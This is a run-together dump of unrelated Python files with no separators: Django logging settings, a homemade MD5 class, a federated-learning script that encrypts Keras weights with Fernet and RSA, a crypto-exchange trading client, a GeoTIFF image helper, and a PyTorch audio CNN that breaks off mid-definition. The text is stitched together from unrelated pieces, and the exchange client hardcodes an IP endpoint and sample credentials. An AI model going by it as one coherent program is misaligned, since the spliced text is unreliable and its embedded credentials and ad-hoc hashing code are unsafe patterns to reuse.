[%(name)s:%(filename)s:%(lineno)s] %(message)s", 'datefmt': "%d/%b/%Y %H:%M:%S" }, 'simple': { 'format': '%(levelname)s %(message)s' }, }, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse', } }, } # How many days to keep usage statistics related information USAGE_STATS_DAYS = config('USAGE_STATS_DAYS', cast=int, default=30) md5.py # -*- coding: utf-8 -*- """ @author: @Due_date: Dec. 
12th, 2019 """ import math class Md5Checker: def __init__(self, byte_stream): self.byte_stream = byte_stream self.A = 0x67452301 self.B = 0xefcdab89 self.C = 0x98badcfe self.D = 0x10325476 self.md5_result = None self.s = [ 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21 ] self.K = [] for i in range(64): self.K.append(math.floor(2 ** 32 * abs(math.sin(i + 1)))) self.padding() print('Bytes after padding(pay attention to the higher and lower bytes direction in each 32 bits):') print(bin(self.byte_stream)) print(hex(self.byte_stream)) print() self.chunk_num = (len(bin(self.byte_stream)[2:]) + 511) // 512 self.chunks = [] dup_bytes = self.byte_stream for i in range(self.chunk_num): self.chunks.append(dup_bytes % (2 ** 512)) dup_bytes = dup_bytes >> 512 self.chunks.reverse() print('\n'.join(['Chunks:'] + list(map(lambda chunk: bin(chunk)[2:], self.chunks)))) print() def padding(self): if self.byte_stream == 0: self.byte_stream = 0b1<<511 return origin_length = (len(bin(self.byte_stream)[2:]) + 7) // 8 * 8 self.byte_stream = self.byte_stream << 8 self.byte_stream += 0x80 cur_length = origin_length + 8 padding_length = 512 - 64 - cur_length % 512 if padding_length < 0: padding_length += 512 self.byte_stream = self.byte_stream << padding_length self.byte_stream = (self.byte_stream << 64) + origin_length % (2 ** 64) def F(self, X, Y, Z): return (((X & Y) | ((0xffffffff - (X & 0xffffffff)) & Z)) & 0xffffffff) def G(self, X, Y, Z): return (((X & Z) | (Y & (0xffffffff - (Z & 0xffffffff)))) & 0xffffffff) def H(self, X, Y, Z): return ((X ^ Y ^ Z) & 0xffffffff) def I(self, X, Y, Z): return ((Y ^ (X | (0xffffffff - (Z & 0xffffffff)))) & 0xffffffff) def FF(self, a, b, c, d, Mj, s, ti): # print('FF:') # print(hex(a), hex(b), hex(c), hex(d), hex(Mj), s, hex(ti)) a += (self.F(b, c, d) & 0xffffffff) + Mj + ti a = ((a & 0xffffffff) << s) | ((a & 0xffffffff) >> (32 - s)) a += b # print(hex(a), hex(b), hex(c), hex(d)) # print(a, b, c, d) # print() return a & 0xffffffff def GG(self, a, b, c, d, Mj, s, ti): # print('GG:') # print(hex(a), hex(b), hex(c), hex(d), hex(Mj), s, hex(ti)) a += (self.G(b, c, d) & 0xffffffff) + Mj + ti a = ((a & 0xffffffff) << s) | ((a & 0xffffffff) >> (32 - s)) a += b # print(hex(a), hex(b), hex(c), hex(d)) # print() return a & 0xffffffff def HH(self, a, b, c, d, Mj, s, ti): # print('HH:') # print(hex(a), hex(b), hex(c), hex(d), hex(Mj), s, hex(ti)) a += (self.H(b, c, d) & 0xffffffff) + Mj + ti a = ((a & 0xffffffff) << s) | ((a & 0xffffffff) >> (32 - s)) a += b # print(hex(a), hex(b), hex(c), hex(d)) # print() return a & 0xffffffff def II(self, a, b, c, d, Mj, s, ti): # print('II:') # print(hex(a), hex(b), hex(c), hex(d), hex(Mj), s, hex(ti)) a += (self.I(b, c, d) & 0xffffffff) + Mj + ti a = ((a & 0xffffffff) << s) | ((a & 0xffffffff) >> (32 - s)) a += b # print(hex(a), hex(b), hex(c), hex(d)) # print() return a & 0xffffffff def reverse4bytes(self, four_bytes): four_bytes = hex(four_bytes)[2:] four_bytes = '0' * (8 - len(four_bytes)) + four_bytes four_bytes = [four_bytes[:2], four_bytes[2:4], four_bytes[4:6], four_bytes[6:]] four_bytes.reverse() return eval('0x' + ''.join(four_bytes)) def single_chunk_process(self, chunk, is_last): words = [] for i in range(16): words.append(self.reverse4bytes(chunk & 0xffffffff)) chunk = chunk >> 32 words.reverse() if is_last: tmp = words[-1] words[-1] = words[-2] 
words[-2] = tmp words[-1] = self.reverse4bytes(words[-1]) words[-2] = self.reverse4bytes(words[-2]) print('\n'.join(['words'] + list(map(lambda word: bin(word)[2:], words)))) a, b, c, d = self.A, self.B, self.C, self.D print('abcd:', hex(a), hex(b), hex(c), hex(d)) for i in range(4): a = self.FF(a, b, c, d, words[4 * i + 0], self.s[4 * i + 0], self.K[4 * i + 0]) d = self.FF(d, a, b, c, words[4 * i + 1], self.s[4 * i + 1], self.K[4 * i + 1]) c = self.FF(c, d, a, b, words[4 * i + 2], self.s[4 * i + 2], self.K[4 * i + 2]) b = self.FF(b, c, d, a, words[4 * i + 3], self.s[4 * i + 3], self.K[4 * i + 3]) # print(hex(a), hex(b), hex(c), hex(d)) words_id = 1 for i in range(4): a = self.GG(a, b, c, d, words[words_id], self.s[4 * i + 16], self.K[4 * i + 16]) words_id += 5 words_id %= 16 d = self.GG(d, a, b, c, words[words_id], self.s[4 * i + 17], self.K[4 * i + 17]) words_id += 5 words_id %= 16 c = self.GG(c, d, a, b, words[words_id], self.s[4 * i + 18], self.K[4 * i + 18]) words_id += 5 words_id %= 16 b = self.GG(b, c, d, a, words[words_id], self.s[4 * i + 19], self.K[4 * i + 19]) words_id += 5 words_id %= 16 words_id = 5 for i in range(4): a = self.HH(a, b, c, d, words[words_id], self.s[4 * i + 32], self.K[4 * i + 32]) words_id += 3 words_id %= 16 d = self.HH(d, a, b, c, words[words_id], self.s[4 * i + 33], self.K[4 * i + 33]) words_id += 3 words_id %= 16 c = self.HH(c, d, a, b, words[words_id], self.s[4 * i + 34], self.K[4 * i + 34]) words_id += 3 words_id %= 16 b = self.HH(b, c, d, a, words[words_id], self.s[4 * i + 35], self.K[4 * i + 35]) words_id += 3 words_id %= 16 words_id = 0 for i in range(4): a = self.II(a, b, c, d, words[words_id], self.s[4 * i + 48], self.K[4 * i + 48]) words_id += 7 words_id %= 16 d = self.II(d, a, b, c, words[words_id], self.s[4 * i + 49], self.K[4 * i + 49]) words_id += 7 words_id %= 16 c = self.II(c, d, a, b, words[words_id], self.s[4 * i + 50], self.K[4 * i + 50]) words_id += 7 words_id %= 16 b = self.II(b, c, d, a, words[words_id], self.s[4 * i + 51], self.K[4 * i + 51]) words_id += 7 words_id %= 16 # print('abcd:', hex(a), hex(b), hex(c), hex(d)) # print('abcd:', bin(a), bin(b), bin(c), bin(d)) # print('ABCD:', hex(self.A), hex(self.B), hex(self.C), hex(self.D)) # print('ABCD:', bin(self.A), bin(self.B), bin(self.C), bin(self.D)) self.A += a self.B += b self.C += c self.D += d self.A &= 0xffffffff self.B &= 0xffffffff self.C &= 0xffffffff self.D &= 0xffffffff print('abcd:', hex(self.A), hex(self.B), hex(self.C), hex(self.D)) def hashing(self): i = 0 for chunk in self.chunks[:-1]: print('Chunk %d:' % i) self.single_chunk_process(chunk, False) i += 1 print('Chunk %d:' % i) self.single_chunk_process(self.chunks[-1], True) self.A = hex(self.reverse4bytes(self.A))[2:] self.B = hex(self.reverse4bytes(self.B))[2:] self.C = hex(self.reverse4bytes(self.C))[2:] self.D = hex(self.reverse4bytes(self.D))[2:] self.A = '0' * (8 - len(self.A)) + self.A self.B = '0' * (8 - len(self.B)) + self.B self.C = '0' * (8 - len(self.C)) + self.C self.D = '0' * (8 - len(self.D)) + self.D self.md5_result = self.A + self.B + self.C + self.D def get_hash(self): if self.md5_result is None: self.hashing() return self.md5_result if __name__ == '__main__': md5_obj = Md5Checker(0) print(md5_obj.get_hash()) import numpy as np import random import cv2 import os from struct import unpack, pack import argparse import socket, pickle import sys import time import subprocess import rsa as rsa_base from imutils import paths from sklearn.model_selection import train_test_split from sklearn.preprocessing 
import LabelBinarizer from sklearn.model_selection import train_test_split from sklearn.utils import shuffle from sklearn.metrics import accuracy_score import tensorflow as tf from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Conv2D from tensorflow.keras.layers import MaxPooling2D from tensorflow.keras.layers import Activation from tensorflow.keras.layers import Flatten from tensorflow.keras.layers import Dense from tensorflow.keras.optimizers import SGD from tensorflow.keras import backend as K import cryptography from cryptography.hazmat.backends import default_backend from cryptography.hazmat.backends.interfaces import RSABackend from cryptography.hazmat.primitives.asymmetric import rsa, padding from cryptography.hazmat.primitives import serialization, hashes from cryptography.fernet import Fernet import rsa as rsa_base from PIL import Image import base64 import hashlib import json import logging #import tflite_runtime.interpreter as tflite #declear path to your mnist data folder img_path = '/home/ec2-user/nitro-enclave-FL/org1/covid_data/' #get the path list using the path object image_paths = list(paths.list_images(img_path)) def load(paths, verbose=-1): '''expects images for each class in seperate dir, e.g all digits in 0 class in the directory named 0 ''' data = list() labels = list() # loop over the input images for (i, imgpath) in enumerate(paths): # load the image and extract the class labels im_gray = cv2.imread(imgpath, cv2.IMREAD_GRAYSCALE) resize = cv2.resize(im_gray,(32,32)) image = np.array(resize).flatten() label = imgpath.split(os.path.sep)[-2] # scale the image to [0, 1] and add to list data.append(image/255) labels.append(label) # show an update every `verbose` images if verbose > 0 and i > 0 and (i + 1) % verbose == 0: print("[INFO] processed {}/{}".format(i + 1, len(paths))) # return a tuple of the data and labels return data, labels #apply our function image_list, label_list = load(image_paths, verbose=10000) #binarize the labels lb = LabelBinarizer() label_list = lb.fit_transform(label_list) #split data into training and test set X_train, X_test, y_train, y_test = train_test_split(image_list, label_list, test_size=0.1, random_state=42) data = list(zip(X_train, y_train)) def batch_data(data_shard, bs=32): '''Takes in a clients data shard and create a tfds object off it args: shard: a data, label constituting a client's data shard bs:batch size return: tfds object''' #seperate shard into data and labels lists data, label = zip(*data_shard) dataset = tf.data.Dataset.from_tensor_slices((list(data), list(label))) return dataset.shuffle(len(label)).batch(bs) #process and batch the training data for each client client_batched = batch_data(data) #process and batch the test set test_batched = tf.data.Dataset.from_tensor_slices((X_test, y_test)).batch(len(y_test)) class SimpleMLP: @staticmethod def build(shape, classes): model = Sequential() model.add(Dense(200, input_shape=(shape,))) model.add(Activation("relu")) model.add(Dense(200)) model.add(Activation("relu")) model.add(Dense(classes)) model.add(Activation("softmax")) return model lr = 0.01 comms_round = 10 loss='categorical_crossentropy' metrics = ['accuracy'] optimizer = SGD(learning_rate=lr, decay=lr / comms_round, momentum=0.9 ) #initialize global model smlp_global = SimpleMLP() global_model = smlp_global.build(1024, 4) # get the global model's weights - will serve as the initial weights for all local models global_weights = global_model.get_weights() #initial list to collect local 
model weights after scalling scaled_local_weight_list = list() smlp_local1 = SimpleMLP() local_model1 = smlp_local1.build(1024, 4) local_model1.compile(loss=loss, optimizer=optimizer, metrics=metrics) #set local model weight to the weight of the global model local_model1.set_weights(global_weights) #fit local model with client's data local_model1.fit(client_batched, epochs=1, verbose=0) def weight_scalling_factor(client_trn_data): #get the bs bs = list(client_trn_data)[0][0].shape[0] #first calculate the total training data points across clinets global_count = (6368+6368)*32#sum([tf.data.experimental.cardinality(clients_trn_data[client_name]).numpy() for client_name in client_names])*bs # get the total number of data points held by a client local_count = tf.data.experimental.cardinality(client_trn_data).numpy()*bs #print(local_count) #6368 return local_count/global_count def scale_model_weights(weight, scalar): '''function for scaling a models weights''' weight_final = [] steps = len(weight) for i in range(steps): weight_final.append(scalar * weight[i]) return weight_final def sum_scaled_weights(scaled_weight_list): '''Return the sum of the listed scaled weights. The is equivalent to scaled avg of the weights''' new_weights = list() for weights_list_tuple in zip(*scaled_weight_list): new_weights.append( [np.array(weights_).mean(axis=0)\ for weights_ in zip(*weights_list_tuple)]) return new_weights #scale the model weights and add to list scaling_factor = weight_scalling_factor(client_batched) scaled_weights = scale_model_weights(local_model1.get_weights(), scaling_factor) scaled_local_weight_list.append(scaled_weights) ######################################### #declear path to your mnist data folder img_path = '/home/ec2-user/nitro-enclave-FL/org2/covid_data/' #get the path list using the path object image_paths = list(paths.list_images(img_path)) #apply our function image_list, label_list = load(image_paths, verbose=10000) #binarize the labels lb = LabelBinarizer() label_list = lb.fit_transform(label_list) #split data into training and test set X_train, X_test, y_train, y_test = train_test_split(image_list, label_list, test_size=0.1, random_state=42) data = list(zip(X_train, y_train)) #process and batch the training data for each client client_batched = batch_data(data) #process and batch the test set test_batched = tf.data.Dataset.from_tensor_slices((X_test, y_test)).batch(len(y_test)) smlp_local2 = SimpleMLP() local_model2 = smlp_local2.build(1024, 4) local_model2.compile(loss=loss, optimizer=optimizer, metrics=metrics) #set local model weight to the weight of the global model local_model2.set_weights(global_weights) #fit local model with client's data local_model2.fit(client_batched, epochs=1, verbose=0) for x in range(len(local_model2.get_weights())): print(local_model2.get_weights()[x].shape) bs = list(client_batched)[0][0].shape[0] local_count2 = tf.data.experimental.cardinality(client_batched).numpy()*bs print(local_count2) #6368 #scale the model weights and add to list scaling_factor = weight_scalling_factor(client_batched) scaled_weights = scale_model_weights(local_model2.get_weights(), scaling_factor) scaled_local_weight_list.append(scaled_weights) #to get the average over all the local model, we simply take the sum of the scaled weights average_weights = sum_scaled_weights(scaled_local_weight_list) npa = list() for x in range(len(average_weights)): npa.append(np.asarray(average_weights[x], dtype=np.float32)) print(len(npa)) for x in range(len(npa)): print(npa[x].shape) 
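# --- Illustrative sketch (not part of the original script) ---------------------------------
# The aggregation above is federated averaging (FedAvg): each client's weights are scaled by
# its share of the total number of training examples and the scaled weights are summed, so the
# scaling factors should add up to roughly 1.0. A minimal standalone version, assuming
# hypothetical inputs `per_client_weights` (a list of per-client weight lists) and
# `per_client_counts` (matching sample counts):
def fed_avg(per_client_weights, per_client_counts):
    """Weighted average of per-client weight lists; equivalent in spirit to the scaling above."""
    total = float(sum(per_client_counts))
    averaged = [np.zeros_like(layer) for layer in per_client_weights[0]]
    for client_weights, count in zip(per_client_weights, per_client_counts):
        for idx, layer in enumerate(client_weights):
            averaged[idx] += (count / total) * layer
    return averaged
# --------------------------------------------------------------------------------------------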
global_model.set_weights(npa) # print(global_model.get_weights()) # print('done') global_weights = global_model.get_weights() def encrypt_in_memory(incoming_bytes: bytes, symmetric_key): encrypted_contents = Fernet(symmetric_key).encrypt(incoming_bytes) return encrypted_contents def load_rsa_keys(): with open('parent_public_key.pem', 'rb') as f: pubkey = rsa_base.PublicKey.load_pkcs1(f.read()) with open('parent_private_key.pem', 'rb') as f: privkey = rsa_base.PrivateKey.load_pkcs1(f.read()) return (pubkey, privkey) data = b'' (parent_public_key, parent_private_key) = load_rsa_keys() data += parent_public_key._save_pkcs1_pem() parent_public_key = rsa_base.PublicKey.load_pkcs1(data) symmetric_key = Fernet.generate_key() encrypted_key = rsa_base.encrypt(symmetric_key, parent_public_key) encrypted_weights = list() for x in range(len(global_weights)): encrypted_content = encrypt_in_memory(global_weights[x].tobytes(), symmetric_key) encrypted_weights.append(encrypted_content) #print(bytes(global_weights[x])) #print(np.array(bytes(global_weights[x]))) # print(len(global_weights)) # print(len(encrypted_weights)) # print(type(encrypted_weights)) # for x in range(len(encrypted_weights)): # print(encrypted_weights[x]) # print(type(encrypted_weights[x])) # break def decrypt_in_memory(encrypted_contents: bytes, encrypted_key: bytes, private_key): decrypted_key = rsa_base.decrypt(encrypted_key, private_key) decrypted_contents = Fernet(decrypted_key).decrypt(encrypted_contents) return decrypted_contents (parent_public_key, parent_private_key) = load_rsa_keys() decrypted_weights = list() for x in range(len(encrypted_weights)): decrypted_content = decrypt_in_memory(encrypted_weights[x], encrypted_key, parent_private_key) decrypted_weights.append(np.frombuffer(decrypted_content, dtype=np.float32)) # print(decrypted_weights) # print('#############################\n############################') # print(global_weights) # print(len(decrypted_weights)) # print(type(decrypted_weights)) # for x in range(len(decrypted_weights)): # print(decrypted_weights[x]) # print(type(decrypted_weights[x])) # break #print(np.array(decrypted_contents)) np.save('global_weights.npy', global_model.get_weights(), allow_pickle=True) # b = np.load('a.npy', allow_pickle=True) def get_public_key(public_key_path: str, get_bytes=True): with open(public_key_path, 'rb') as key_file: public_key = serialization.load_pem_public_key( key_file.read(), backend=default_backend() ) public_key_bytes = public_key.public_bytes( encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo ) if get_bytes: return public_key_bytes else: return public_key def encrypt(file_path, public_key_path): public_key = get_public_key(public_key_path, get_bytes=False) symmetric_key = Fernet.generate_key() encrypted_key = public_key.encrypt( symmetric_key, padding=padding.OAEP( mgf=padding.MGF1(algorithm=hashes.SHA256()), algorithm=hashes.SHA256(), label=None ) ) with open(file_path, 'rb') as file_in: encrypted_contents = Fernet(symmetric_key).encrypt(file_in.read()) with open(file_path+'.encrypted', 'wb') as file_out: file_out.write(encrypted_contents) return encrypted_key #encrypted_key = encrypt('global_weights.npy', 'parent_public_key.pem') from io import BytesIO np_bytes = BytesIO() np.save(np_bytes, global_model.get_weights(), allow_pickle=True) np_bytes = np_bytes.getvalue() load_bytes = BytesIO(np_bytes) loaded_np = np.load(load_bytes, allow_pickle=True) # print(b) # print(global_model.get_weights()) 
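# --- Illustrative sketch (not part of the original script) ---------------------------------
# The pattern above is hybrid encryption: Fernet (symmetric, authenticated) encrypts the bulk
# of the serialized layer bytes, while RSA only wraps the small Fernet key. One caveat worth
# making explicit: ndarray.tobytes() drops dtype and shape, so after decryption the buffer has
# to be restored with np.frombuffer(...).reshape(...). A minimal round-trip for one layer:
def roundtrip_layer(layer, fernet_key):
    """Encrypt then decrypt a single weight array, restoring its dtype and shape."""
    token = Fernet(fernet_key).encrypt(layer.tobytes())
    plain = Fernet(fernet_key).decrypt(token)
    return np.frombuffer(plain, dtype=layer.dtype).reshape(layer.shape)
# --------------------------------------------------------------------------------------------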
#print(local_model2.get_weights()) # weights = list() # weights.append(global_weights) # weights.append(local_weights) # new_weights = list() # for weights_list_tuple in zip(*weights): # new_weights.append( # [np.array(weights_).mean(axis=0)\ # for weights_ in zip(*weights_list_tuple)]) # print(global_weights) # global_model.set_weights(new_weights) # global_weights = global_model.get_weights() # print(global_weights) # data_string = pickle.dumps(global_weights) # data_arr = pickle.loads(data_string) # global_model.save('saved_model/global_model') # new_model = tf.keras.models.load_model('saved_model/global_model') # # Convert the model # converter = tf.lite.TFLiteConverter.from_saved_model('saved_model/global_model') # path to the SavedModel directory # tflite_model = converter.convert() # # Save the model. # with open('model.tflite', 'wb') as f: # f.write(tflite_model) # # Load TFLite model and allocate tensors. # print('loading .tflite model...') # # TFLITE model was converted from the full h5 model stored here: https://github.com/uyxela/Skin-Lesion-Classifier/ # interpreter = tflite.Interpreter(model_path="model.tflite") # print('done.') # interpreter.allocate_tensors() # # Get input and output tensors. # input_details = interpreter.get_input_details() # output_details = interpreter.get_output_details() # all_layers_details = interpreter.get_tensor_details() # # printing the list using loop # print(global_weights) # print('###########################################################') # print(npa) # arr = list() # for x in range(len(global_weights)): # arr.append(global_weights[x].tobytes()) # arr1 = list() # for x in range(len(arr)): # arr1.append(np.frombuffer(arr[x], dtype=np.float32)) # print(arr1) #print(decrypted_weights) # print(global_weights) # data_string = pickle.dumps(npa) # data_arr = pickle.loads(data_string) # print(data_arr) from utils import Order from exchanges.base import ExchangeService from requestUtils.request import get, post from exchanges.sisty.sisty_key import MD5Key from twisted.python.failure import Failure import hashlib import urllib import time from twisted.internet import reactor from twisted.logger import Logger import json def httpGet(url, resource, params, callback=None, errback=None): headers = { "Content-type": ["application/x-www-form-urlencoded"], 'User-Agent': ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'], } postdata = urllib.parse.urlencode(params) # print(url + resource + '?' + postdata) d = get( reactor, url=url + resource + '?' 
+ postdata, headers=headers ) if callback: d.addCallback(callback) if errback: d.addErrback(errback) return d def httpPost(url, resource, params, callback=None, errback=None): headers = { "Content-type": ["application/x-www-form-urlencoded"], 'User-Agent': ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'], } postdata = urllib.parse.urlencode(params) # print(url + resource) # print(postdata) d = post( reactor, url=url + resource, headers=headers, body=postdata ) if callback: d.addCallback(callback) if errback: d.addErrback(errback) return d def getSign(*args): data = '' for arg in args: assert isinstance(arg, str) data += arg return hashlib.md5(data.encode("utf8")).hexdigest().upper() class Sisty(ExchangeService): log = Logger() def __init__(self, url, md5Key, userId, secret): self.__url = url self.__md5Key = md5Key self.__userId = userId self.__secret = secret def getSymbol(self, pairs): coin, money = pairs return '_'.join((coin, money)).lower() def ebFailed(self, failure): self.log.error("{failure}", failure=failure) return failure def getTicker(self, pairs): URL = "/trademarket/v1/api/ticker" params = { 'market': self.getSymbol(pairs), } def handleBody(body): data = json.loads(body) assert 'ticker' in data return data['ticker'] return httpGet(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def getOrderBook(self, pairs): URL = "/trademarket/v1/api/depth" # self.log.debug("{url}", url=self.__url) params = { 'market': self.getSymbol(pairs), } def handleBody(body): data = json.loads(body) assert 'bids' in data and 'asks' in data bids = data['bids'] asks = data['asks'] return [bids, asks] return httpGet(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def trade(self, pairs, price, amount, tradeType): URL = "/tradeOpen/v2/apiAddEntrustV2Robot" cipherText = getSign(self.__userId, pairs[0], self.__secret, pairs[1], self.__md5Key) # self.log.debug("{cipherText}{key}", cipherText=cipherText, key=self.__md5Key) params = { 'coinName': pairs[0], 'payCoinName': pairs[1], 'amount': amount, 'price': price, 'type': tradeType, # 1: buy, 2: sell 'cipherText': cipherText, 'secret': self.__secret, 'userId': self.__userId } def handleBody(body): # self.log.debug("{body}", body=body) data = json.loads(body) assert 'code' in data if data['code'] == 0: return data else: self.log.error('errorCode: {code}', code=data['code']) return None return httpPost(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def cancel(self, pairs, orderId=""): URL = "/tradeOpen/v2/apiCancelEntrustV2Robot" cipherText = getSign(self.__userId, orderId, self.__md5Key) params = { 'entrustId': orderId, 'cipherText': cipherText, 'userId': self.__userId } def handleBody(body): data = json.loads(body) assert 'code' in data if data['code'] == 0: return True else: self.log.debug("{data}", data=data) return False return httpPost(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def cancelAll(self, pairs, cancelType, isAll=False): """ isAll: True: cancel all pairs, False: cancel given pairs cancelType: 0: all bids and asks, 1: all bids, 2: all asks """ URL = "/tradeOpen/v1/batchCancel" cipherText = getSign(self.__userId, pairs[0], pairs[1], self.__md5Key) # self.log.debug("{cipherText}{key}", cipherText=cipherText, key=self.__md5Key) cancelType = bytes(cancelType) params = { 'coinName': pairs[0], 'payCoinName': pairs[1], 'isAll': isAll, # True: cancel all pairs, False: cancel given pairs 'type': cancelType, # 
0: all bids and asks, 1: all bids, 2: all asks 'cipherText': cipherText, 'userId': self.__userId } def handleBody(body): data = json.loads(body) assert 'model' in data if data['model'] == 0: return True else: self.log.debug("{data}", data=data) return False return httpPost(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def getOrder(self, pairs, orderId=""): URL = "/tradeOpen/v2/selectEntrustById" cipherText = getSign(self.__userId, orderId, self.__md5Key) params = { 'entrustId': orderId, 'cipherText': cipherText, 'userId': self.__userId } def handleBody(body): data = json.loads(body) assert 'code' in data if data['code'] == 0: return data else: self.log.error('errorCode: {code}', code=data['code']) return None return httpPost(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def getOrders(self, pairs, tradeType, status, pageNum=1, pageSize=100): URL = "/tradeOpen/v2/apiSelectEntrustV2Robot" cipherText = getSign(self.__userId, self.__md5Key) params = { 'coinName': pairs[0], 'payCoinName': pairs[1], 'type': tradeType, 'status': status, 'pageNum': pageNum, 'pageSize': pageSize, 'cipherText': cipherText, 'userId': self.__userId } def handleBody(body): data = json.loads(body) # self.log.debug("{data}", data=data) assert 'code' in data if data['code'] == 0: return data else: self.log.error('errorCode: {code}', code=data['code']) return None return httpPost(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) def getUserInfo(self): URL = "/tradeOpen/v3/getUserCapitalInfoRobot" cipherText = getSign(self.__userId, self.__md5Key) params = { 'cipherText': cipherText, 'userId': self.__userId } def handleBody(body): data = json.loads(body) assert 'code' in data if data['code'] == 0: return data else: return None return httpPost(self.__url, URL, params, callback=handleBody, errback=self.ebFailed) sisty = Sisty('http://47.75.31.125/app', MD5Key, '222', '12345678') pomadchin/raster-foundry import os from rf.models import Image from rf.utils.io import Visibility from .io import get_geotiff_size_bytes, get_geotiff_resolution from .create_bands import create_geotiff_bands def create_geotiff_image( tif_path, sourceuri, filename=None, visibility=Visibility.PRIVATE, imageMetadata={}, scene=None, owner=None, band_create_function=create_geotiff_bands, ): """Create an Image object from a GeoTIFF. Args: tif_path (str): Local path to tif file sourceuri (str): remote source of image visibility (str): accessibility level for object imageMetadata (dict): Optional dict of metadata about the image scene (Scene): Optional Scene object holding this image owner (str): Optional owner of an image band_create_function (function): function to aid in creating bands for a geotiff """ filename = filename if filename else os.path.basename(tif_path) return Image( get_geotiff_size_bytes(tif_path), visibility, filename, sourceuri, band_create_function(tif_path), imageMetadata, # TIFFs can have a different resolution in the X and Y directions, that is, pixels can be # rectangular with respect to the ground. The RF API doesn't currently support this, so just # select the X resolution. 
get_geotiff_resolution(tif_path)[0], [], scene=scene, owner=owner, ) """trains model, saves checkpoint files and csv files of best metrics""" from datetime import datetime import os import shutil import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from torch.utils.data import DataLoader from load_dataset import AudioDataset, TRAIN_WEIGHTS from make_predictions import make_prediction_csv from metrics import evaluate, micro_averaged_auprc TRAIN_MODE = 'all' # options: all (37 classes), coarse (8 classes), fine (29 classes) train_mode_dict = {'all': 37, 'coarse': 8, 'fine': 29} # train_mode: num_labels DATE = datetime.now().strftime('%Y%m%d_%H%M%S') RUN_NAME = DATE PREDICTION_PATH = f'csvs/{RUN_NAME}.csv' ANNOTATIONS_PATH = "dcase_files/annotations.csv" YAML_PATH = "dcase_files/dcase-ust-taxonomy.yaml" BATCH_SIZE = 32 NUM_CLASSES = train_mode_dict[TRAIN_MODE] NUM_EPOCHS = 10000 ## load model from checkpoint CHECKPOINT = True CHECKPOINT_PATH = "models/20190610_083507_coarse=0.777_fine=0.644.ckpt" ## apply weights to classes to deal with unbalanced dataset APPLY_CLASS_WEIGHTS = False WEIGHT_SMOOTHING = .1 # 1: balanced weight, < 1: reduced weight delta, > 1: increased weight delta device = torch.device("cuda" if torch.cuda.is_available() else "cpu") train_dir = "path/to/train/dataset/pickle/files.pkl" test_dir = "path/to/validate/dataset/pickle/files.pkl" TRAIN = AudioDataset(train_dir, with_embeddings=True) TEST = AudioDataset(test_dir, with_embeddings=True) TRAIN_LOADER = DataLoader(dataset=TRAIN, batch_size=BATCH_SIZE, shuffle=True) TEST_LOADER = DataLoader(dataset=TEST, batch_size=BATCH_SIZE, shuffle=True) class ConvBlock(nn.Module): """creates a convolutional layer with optional maxpool, batchnorm, and dropout""" def __init__(self, in_channels, out_channels, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), batchnorm=True, maxpool=True, maxpool_size=(2, 2), dropout=None): super(ConvBlock, self).__init__() self.conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding) if maxpool: self.mp = nn.MaxPool2d(maxpool_size, stride=maxpool_size) else: self.mp = None if batchnorm: self.bn = nn.BatchNorm2d(out_channels) else: self.bn = None if dropout: self.dropout = nn.Dropout(dropout) else: self.dropout = None # self.init_weights() def forward(self, nn_input): x = nn_input if self.bn: x = F.relu(self.bn(self.conv(x))) else: x = F.relu(self.conv(x)) if self.mp: x = self.mp(x) if self.dropout: x = self.dropout(x) return x class AudioCNN(nn.Module): """Convolutions over spectrogram; merges with VGG-ish embeddings for fully-connected layers""" def __init__(self): super(AudioCNN, self).__init__() DROPOUT = .5 self.emb_size = 49152 # spectrogram convolutions self.conv_block_1 = ConvBlock(in_channels=1, out_channels=8, kernel_size=(1, 1), stride=(1, 1), padding=(0, 0), batchnorm=True, maxpool=False, maxpool_size=None, dropout=DROPOUT) self.conv_block_2 = ConvBlock(in_channels=8, out_channels=16, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), batchnorm=True, maxpool=False, maxpool_size=None, dropout=DROPOUT) self.conv_block_3 = ConvBlock(in_channels=16, out_channels=32, kernel_size=(16, 128), stride=(4, 16), padding=(8, 16), batchnorm=True, maxpool=True, maxpool_size=(4, 4), dropout=DROPOUT) self.conv_block_4 = ConvBlock(in_channels=32, out_channels=64, kernel_size=(5, 5), stride=(2, 2), padding=(1, 1), batchnorm=True, maxpool=False, maxpool_size=None, dropout=DROPOUT) self.conv_block_5 = 
